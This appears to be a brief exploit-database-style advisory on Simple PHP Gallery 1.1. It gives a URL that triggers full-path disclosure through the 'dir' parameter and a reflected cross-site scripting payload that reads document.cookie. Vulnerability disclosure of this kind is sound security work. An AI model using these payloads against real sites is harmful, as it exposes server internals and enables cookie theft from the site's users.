Cross site scripting & fullpath disclosure
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
;;ii,,:: +
+ :::: ::
;;tt;;:: +
+ ;;:: ..,,::
;;ii,,:: +
+ ,,,, ii;;,, ii;;::
;;ii,,:: +
+ ii:: tt;;,, ..tt;;,,..
;;ii;;:: +
+ ii,,:: ttii,, ..ff;;;;::
;;ii;;:: +
+ tt;;::..,, tt;;,, ff;;;;ii
;;ii,,:: +
+ tt;;::;;:: tt;;,,.. jj;;,,..
;;tt,,:: +
+ tt;;;;,, tt;;,,.. tt;;;;
;;ii;;:: +
+ ..::,,;;,, tt;;,,.. tt;;,,
;;ii,,:: +
+ ..::,,ii;;;;.. tt;;,,.. iiii,,::
;;ii,,:: +
+ ::,,ttiijj;;,, tt;;;;.. ;;tt,,::
;;ii,,:: +
+ ,,;;ii tt;;,, ii;;,,.. ..jj;;::
;;ii;;:: +
+ ;;;;:: tt;;:: tt;;;;.. ff;;::
;;tt,,.. +
+ ii;;.. ,,ii;;:: ii;;,,.. jj;;,,
;;ii,,.. +
+ ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,,
;;ii;;.. +
+ tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,,
;;ii,,.. +
+ jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,,
;;ii,,.. +
+ ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,,
;;ii;;.. +
+ ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,,
;;ii,,.. +
+ iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,,
;;ii;; +
+ ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;::
;;ii,, +
+ jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;;
;;ii,, +
+ jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii::
;;ii:: +
+ iijjjjjjtt;; ;;ffffjjjjtt::
;;ii +
+ ;;..
ii;; +
+
.. +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker
+
+
+
+Script : Simple PHP Gallery 1.1
+
+Impact : Cross site scripting & fullpath disclosure
+
+
+
+
+
+Fullpath disclosure :
+
+
+
+http://localhost/sp_index.php?dir=[Somthingwrong]
+
+
+
+Result
+
+
+
+
+
+Warning: opendir(123): failed to open dir: No such file or directory in
/var/www/html/gallery/sp_helper_functions.php on line 10 +
+
+
+Warning: readdir(): supplied argument is not a valid Directory resource in
/var/www/html/gallery/sp_helper_functions.php on line 11 +
+
+
+Warning: Invalid argument supplied for foreach() in
/var/www/html/gallery/sp_def_vars.php on line 147
+
+
+
+
+
+
+
+
+
+Cross Site Scripting
+
+
+
+
+
+
+
+dir variable is not probrely verified and can be used to execute html and
javascript code +
+
+
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script>
+
+
+
+/Milw0rm
+
+
+
+
+
+in subject hot : Cross site scripting & fullpath disclosure ;)
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++